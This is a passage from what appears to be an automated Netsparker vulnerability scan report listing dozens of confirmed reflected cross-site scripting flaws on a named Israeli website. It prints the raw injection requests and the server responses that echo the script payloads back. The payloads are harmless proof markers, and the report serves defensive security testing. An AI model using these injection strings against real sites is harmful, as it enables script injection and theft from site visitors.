404;http://www.shalomlaam.co.il:80/site/l/'"--></style></script><script>netsparker(0x0002A2)</script><BR>script><BR>style><<script>netsparker(0x0002A2)<.asp?id=script>
3.43. /site/Presentation/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
<script>alert(0x0002DC)</script>
41 / 146
Request
GET /site/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002DC)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:55 GMT
Content-Length: 178
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/Presentation/'"--></style></script><script>netsparker(0x0002DC)</script><BR>script><BR>style><<script>netsparker(0x0002DC)<.asp?id=script>
3.44. /js/images/'%22--
CONFIRMED
http://www.shalomlaam.co.il/js/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00040C)%..
Parameters
<script>alert(0x00040C)</script>
Request
GET /js/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00040C)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:54 GMT
Content-Length: 170
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/images/'"--></style></script><script>netsparker(0x00040C)</script><BR>script><BR>style><<script>netsparker(0x00040C)<.asp?id=script>
3.45. /site/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000106)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000106)%3C/sc..
Parameters
Request
GET /site/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000106)%3C/script%3E HTTP/1.1
42 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:09 GMT
Content-Length: 165
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/'"--></style></script><script>netsparker(0x000106)</script><BR>script><BR>style><<script>netsparker(0x000106)<.asp?id=script>
3.46. /js/getbanner.asp CONFIRMED
http://www.shalomlaam.co.il/js/getbanner.asp?'"--></style></script><script>alert(0x0003EB)</script>
Parameters
odiv GET 3
<script>alert(0x0003EB)</script>
Request
GET /js/getbanner.asp?'"--></style></script><script>netsparker(0x0003EB)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:35 GMT
Content-Length: 177
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/getbanner.asp?'"--></style></script><script>netsparker(0x0003EB)</script><BR>script><BR>style><<script>netsparker(0x0003EB)<.asp?id=script>
3.47. /vod/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00016B)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/vod/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00016B)%3C/scr..
Parameters
Request
GET /vod/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00016B)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:45:55 GMT
Content-Length: 164
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/vod/'"--></style></script><script>netsparker(0x00016B)</script><BR>script><BR>style><<script>netsparker(0x00016B)<.asp?id=script>
43 / 146
3.48. /gvideo/index.html'%22--
CONFIRMED
http://www.shalomlaam.co.il/gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..
Parameters
Request
GET /gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000134)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:28 GMT
Content-Length: 177
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/gvideo/index.html'"--></style></script><script>netsparker(0x000134)</script><BR>script><BR>style><<script>netsparker(0x000134)<.asp?id=script>
3.49. /site/Branches/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002..
Parameters
Request
GET /site/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A1)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:22 GMT
Content-Length: 174
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/Branches/'"--></style></script><script>netsparker(0x0002A1)</script><BR>script><BR>style><<script>netsparker(0x0002A1)<.asp?id=script>
44 / 146
3.50. /ask/answer.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001..
Parameters
id GET 805
Request
GET /ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000195)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:46:57 GMT
Content-Length: 174
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/ask/answer.asp'"--></style></script><script>netsparker(0x000195)</script><BR>script><BR>style><<script>netsparker(0x000195)<.asp?id=script>
3.51. /about'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004F1)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/about'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004F1)%3C/sc..
Parameters
<script>alert(0x0004F1)</script>
Request
GET /about'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004F1)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/about/
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:03:49 GMT
Content-Length: 165
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/about'"--></style></script><script>netsparker(0x0004F1)</script><BR>script><BR>style><<script>netsparker(0x0004F1)<.asp?id=script>
45 / 146
3.52. /images/pagetop.asp CONFIRMED
http://www.shalomlaam.co.il/images/pagetop.asp?'"--></style></script><script>alert(0x0003EA)</script>
Parameters
<script>alert(0x0003EA)</script>
Request
GET /images/pagetop.asp?'"--></style></script><script>netsparker(0x0003EA)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/images/
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:34 GMT
Content-Length: 179
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/images/pagetop.asp?'"--></style></script><script>netsparker(0x0003EA)</script><BR>script><BR>style><<script>netsparker(0x0003EA)<.asp?id=script>
3.53. /pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011F)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011F)%3C/scr..
Parameters
Request
GET /pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00011F)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:19 GMT
Content-Length: 164
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/pic/'"--></style></script><script>netsparker(0x00011F)</script><BR>script><BR>style><<script>netsparker(0x00011F)<.asp?id=script>
3.54. /about/search/default.asp CONFIRMED
http://www.shalomlaam.co.il/about/search/default.asp?'"--></style></script><script>alert(0x000560)</..
Parameters
q GET 3
46 / 146
Request
GET /about/search/default.asp?'"--></style></script><script>netsparker(0x000560)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:04:25 GMT
Content-Length: 185
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/about/search/default.asp?'"--></style></script><script>netsparker(0x000560)</script><BR>script><BR>style><<script>netsparker(0x000560)<.asp?id=script>
3.55. /images/Default.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/images/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Request
GET /images/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003E9)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:34 GMT
Content-Length: 178
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/images/Default.asp'"--></style></script><script>netsparker(0x0003E9)</script><BR>script><BR>style><<script>netsparker(0x0003E9)<.asp?id=script>
3.56. /news/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000400)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/news/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000400)%3C/sc..
Parameters
Request
GET /news/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000400)%3C/script%3E HTTP/1.1
47 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:49 GMT
Content-Length: 165
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/news/'"--></style></script><script>netsparker(0x000400)</script><BR>script><BR>style><<script>netsparker(0x000400)<.asp?id=script>
3.57. /pages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001F1)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/pages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001F1)%3C/s..
Parameters
Request
GET /pages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F1)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:48:17 GMT
Content-Length: 166
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/pages/'"--></style></script><script>netsparker(0x0001F1)</script><BR>script><BR>style><<script>netsparker(0x0001F1)<.asp?id=script>
3.58. /vod/vod.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/vod/vod.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000160)..
Parameters
id GET 1763
Request
GET /vod/vod.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000160)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:45:17 GMT
Content-Length: 171
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/vod/vod.asp'"--></style></script><script>netsparker(0x000160)</script><BR>script><BR>style><<script>netsparker(0x000160)<.asp?id=script>
48 / 146
3.59. /site/gallery/highslide/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..
Parameters
Request
GET /site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E8)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:43:56 GMT
Content-Length: 183
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/gallery/highslide/'"--></style></script><script>netsparker(0x0000E8)</script><BR>script><BR>style><<script>netsparker(0x0000E8)<.asp?id=script>
3.60. /search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D7)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D7)%3C/..
Parameters
Request
GET /search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D7)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:48:04 GMT
Content-Length: 167
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/search/'"--></style></script><script>netsparker(0x0001D7)</script><BR>script><BR>style><<script>netsparker(0x0001D7)<.asp?id=script>
49 / 146
3.61. /home/home_page.css'%22--
CONFIRMED
http://www.shalomlaam.co.il/home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Request
GET /home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00011E)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:18 GMT
Content-Length: 178
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/home/home_page.css'"--></style></script><script>netsparker(0x00011E)</script><BR>script><BR>style><<script>netsparker(0x00011E)<.asp?id=script>
3.62. /js/upload_image.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/js/upload_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..
Parameters
field GET picture_
<script>alert(0x0003AF)</script>
Request
GET /js/upload_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003AF)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:19 GMT
Content-Length: 179
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/upload_image.asp'"--></style></script><script>netsparker(0x0003AF)</script><BR>script><BR>style><<script>netsparker(0x0003AF)<.asp?id=script>
50 / 146
3.63. /vod/vod.asp CONFIRMED
http://www.shalomlaam.co.il/vod/vod.asp?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..
Parameters
id GET '"--></style></script>
Request
GET /vod/vod.asp?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00015D)%3C/script%3E HTTP/1.1
Response
';
}
</script>
<tr><td align="center">
<video width="594" height="350" controls>
</style></script><script>netsparker(0x00015D)</script>_fix.mp4" type="video/mp4">-->
<source src="http://lavishilo.org/temp/54.mp4" type="video/mp4">
Your browser does not support the video tag.
</video>
</td></tr><tr>
<Td dir="rtl"
3.64. /jAccordion/jquery.easing.1.3.min.js'%22--
CONFIRMED
http://www.shalomlaam.co.il/jAccordion/jquery.easing.1.3.min.js'%22--%3E%3C/style%3E%3C/script%3E%3C..
Parameters
Request
GET /jAccordion/jquery.easing.1.3.min.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000F5)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:05 GMT
Content-Length: 195
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/jAccordion/jquery.easing.1.3.min.js'"--></style></script><script>netsparker(0x0000F5)</script><BR>script><BR>style><<script>netsparker(0x0000F5)<.asp?
id=script>
51 / 146
3.65. /page/odot/'%22--
CONFIRMED
http://www.shalomlaam.co.il/page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%..
Parameters
Request
GET /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E2)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:03:44 GMT
Content-Length: 170
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/page/odot/'"--></style></script><script>netsparker(0x0004E2)</script><BR>script><BR>style><<script>netsparker(0x0004E2)<.asp?id=script>
3.66. /about/search/ CONFIRMED
http://www.shalomlaam.co.il/about/search/?'"--></style></script><script>alert(0x000534)</script>
Parameters
Request
GET /about/search/?'"--></style></script><script>netsparker(0x000534)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:04:12 GMT
Content-Length: 174
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/about/search/?'"--></style></script><script>netsparker(0x000534)</script><BR>script><BR>style><<script>netsparker(0x000534)<.asp?id=script>
3.67. /reg/maillingUpdate.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
52 / 146
Request
GET /reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D5)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:48:03 GMT
Content-Length: 182
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/reg/maillingUpdate.asp'"--></style></script><script>netsparker(0x0001D5)</script><BR>script><BR>style><<script>netsparker(0x0001D5)<.asp?id=script>
3.68. /about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013C)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013C)%3C/s..
Parameters
Request
GET /about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00013C)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:34 GMT
Content-Length: 166
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/about/'"--></style></script><script>netsparker(0x00013C)</script><BR>script><BR>style><<script>netsparker(0x00013C)<.asp?id=script>
3.69. /contact/search/'%22--
CONFIRMED
http://www.shalomlaam.co.il/contact/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..
Parameters
Request
GET /contact/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004A9)%3C/script%3E HTTP/1.1
53 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:03:21 GMT
Content-Length: 175
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/contact/search/'"--></style></script><script>netsparker(0x0004A9)</script><BR>script><BR>style><<script>netsparker(0x0004A9)<.asp?id=script>
3.70. /uploadimages/2011_8_22_13_2_45.JPG'%22--
CONFIRMED
http://www.shalomlaam.co.il/uploadimages/2011_8_22_13_2_45.JPG'%22--%3E%3C/style%3E%3C/script%3E%3Cs..
Parameters
Request
GET /uploadimages/2011_8_22_13_2_45.JPG'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000573)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:04:32 GMT
Content-Length: 194
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/uploadimages/2011_8_22_13_2_45.JPG'"--></style></script><script>netsparker(0x000573)</script><BR>script><BR>style><<script>netsparker(0x000573)<.asp?
id=script>
3.71. /snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000234)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000234)%3C..
Parameters
id GET 61
Request
GET /snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000234)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:48:47 GMT
Content-Length: 168
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/snif.asp'"--></style></script><script>netsparker(0x000234)</script><BR>script><BR>style><<script>netsparker(0x000234)<.asp?id=script>
54 / 146
3.72. /maillingUpdate.asp CONFIRMED
http://www.shalomlaam.co.il/maillingUpdate.asp?'"--></style></script><script>alert(0x000218)</script>
Parameters
Request
GET /maillingUpdate.asp?'"--></style></script><script>netsparker(0x000218)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:48:36 GMT
Content-Length: 179
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/maillingUpdate.asp?'"--></style></script><script>netsparker(0x000218)</script><BR>script><BR>style><<script>netsparker(0x000218)<.asp?id=script>
3.73. /js/func_site.js'%22--
CONFIRMED
http://www.shalomlaam.co.il/js/func_site.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..
Parameters
<script>alert(0x0000DC)</script>
Request
GET /js/func_site.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000DC)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:43:53 GMT
Content-Length: 175
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/func_site.js'"--></style></script><script>netsparker(0x0000DC)</script><BR>script><BR>style><<script>netsparker(0x0000DC)<.asp?id=script>
3.74. /home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/sc..
Parameters
55 / 146
Request
GET /home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00010D)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:15 GMT
Content-Length: 165
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/home/'"--></style></script><script>netsparker(0x00010D)</script><BR>script><BR>style><<script>netsparker(0x00010D)<.asp?id=script>
3.75. /tags/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BB)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/tags/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BB)%3C/sc..
Parameters
<script>alert(0x0001BB)</script>
Request
GET /tags/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BB)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:31 GMT
Content-Length: 165
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/tags/'"--></style></script><script>netsparker(0x0001BB)</script><BR>script><BR>style><<script>netsparker(0x0001BB)<.asp?id=script>
3.76. /site/bmidrash/answer.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/bmidrash/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..
Parameters
id GET 128
alon GET 460
Request
GET /site/bmidrash/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00037E)%3C/script%3E HTTP/1.1
56 / 146
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:59:54 GMT
Content-Length: 184
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/bmidrash/answer.asp'"--></style></script><script>netsparker(0x00037E)</script><BR>script><BR>style><<script>netsparker(0x00037E)<.asp?id=script>
3.77. /UploadImages/'%22--
CONFIRMED
http://www.shalomlaam.co.il/UploadImages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010..
Parameters
Request
GET /UploadImages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000109)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:11 GMT
Content-Length: 173
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/UploadImages/'"--></style></script><script>netsparker(0x000109)</script><BR>script><BR>style><<script>netsparker(0x000109)<.asp?id=script>
3.78. /yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AF)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AF)%3C..
Parameters
<script>alert(0x0001AF)</script>
Request
GET /yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AF)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:47:25 GMT
Content-Length: 168
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/yeshiva/'"--></style></script><script>netsparker(0x0001AF)</script><BR>script><BR>style><<script>netsparker(0x0001AF)<.asp?id=script>
57 / 146
3.79. /alon/list.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015..
Parameters
Request
GET /alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:52 GMT
Content-Length: 173
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/alon/list.asp'"--></style></script><script>netsparker(0x000156)</script><BR>script><BR>style><<script>netsparker(0x000156)<.asp?id=script>
3.80. /site/uploadimages/'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/uploadimages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Request
GET /site/uploadimages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002B4)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:56:30 GMT
Content-Length: 178
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/uploadimages/'"--></style></script><script>netsparker(0x0002B4)</script><BR>script><BR>style><<script>netsparker(0x0002B4)<.asp?id=script>
58 / 146
3.81. /about/reg/ CONFIRMED
http://www.shalomlaam.co.il/about/reg/?'"--></style></script><script>alert(0x0004FE)</script>
Parameters
<script>alert(0x0004FE)</script>
Request
GET /about/reg/?'"--></style></script><script>netsparker(0x0004FE)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:03:56 GMT
Content-Length: 171
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/about/reg/?'"--></style></script><script>netsparker(0x0004FE)</script><BR>script><BR>style><<script>netsparker(0x0004FE)<.asp?id=script>
3.82. /about/reg/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004FA)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/about/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004FA)%..
Parameters
<script>alert(0x0004FA)</script>
Request
GET /about/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004FA)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:03:54 GMT
Content-Length: 170
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/about/reg/'"--></style></script><script>netsparker(0x0004FA)</script><BR>script><BR>style><<script>netsparker(0x0004FA)<.asp?id=script>
59 / 146
3.83. /js/getbanner.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/js/getbanner.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..
Parameters
odiv GET 3
Request
GET /js/getbanner.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003E5)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:00:33 GMT
Content-Length: 176
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/js/getbanner.asp'"--></style></script><script>netsparker(0x0003E5)</script><BR>script><BR>style><<script>netsparker(0x0003E5)<.asp?id=script>
3.84. /site/bmidrash/list.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/site/bmidrash/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
Request
GET /site/bmidrash/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00033E)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:58:46 GMT
Content-Length: 182
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/site/bmidrash/list.asp'"--></style></script><script>netsparker(0x00033E)</script><BR>script><BR>style><<script>netsparker(0x00033E)<.asp?id=script>
60 / 146
3.85. /contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000138)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000138)%3C..
Parameters
Request
GET /contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000138)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:44:31 GMT
Content-Length: 168
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/contact/'"--></style></script><script>netsparker(0x000138)</script><BR>script><BR>style><<script>netsparker(0x000138)<.asp?id=script>
3.86. /contact/search/default.asp CONFIRMED
http://www.shalomlaam.co.il/contact/search/default.asp?'"--></style></script><script>alert(0x0004D6)..
Parameters
q GET 3
Request
GET /contact/search/default.asp?'"--></style></script><script>netsparker(0x0004D6)</script> HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 14:03:35 GMT
Content-Length: 187
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/contact/search/default.asp?'"--></style></script><script>netsparker(0x0004D6)</script><BR>script><BR>style><<script>netsparker(0x0004D6)<.asp?id=script>
61 / 146
3.87. /maillingUpdate.asp'%22--
CONFIRMED
http://www.shalomlaam.co.il/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Request
GET /maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000210)%3C/script%3E HTTP/1.1
Response
HTTP/1.1 200 OK
Date: Tue, 20 May 2014 13:48:33 GMT
Content-Length: 178
Pragma: no-cache
404;http://www.shalomlaam.co.il:80/maillingUpdate.asp'"--></style></script><script>netsparker(0x000210)</script><BR>script><BR>style><<script>netsparker(0x000210)<.asp?id=script>
3.88. /js/top1.htm'%22--
CONFIRMED
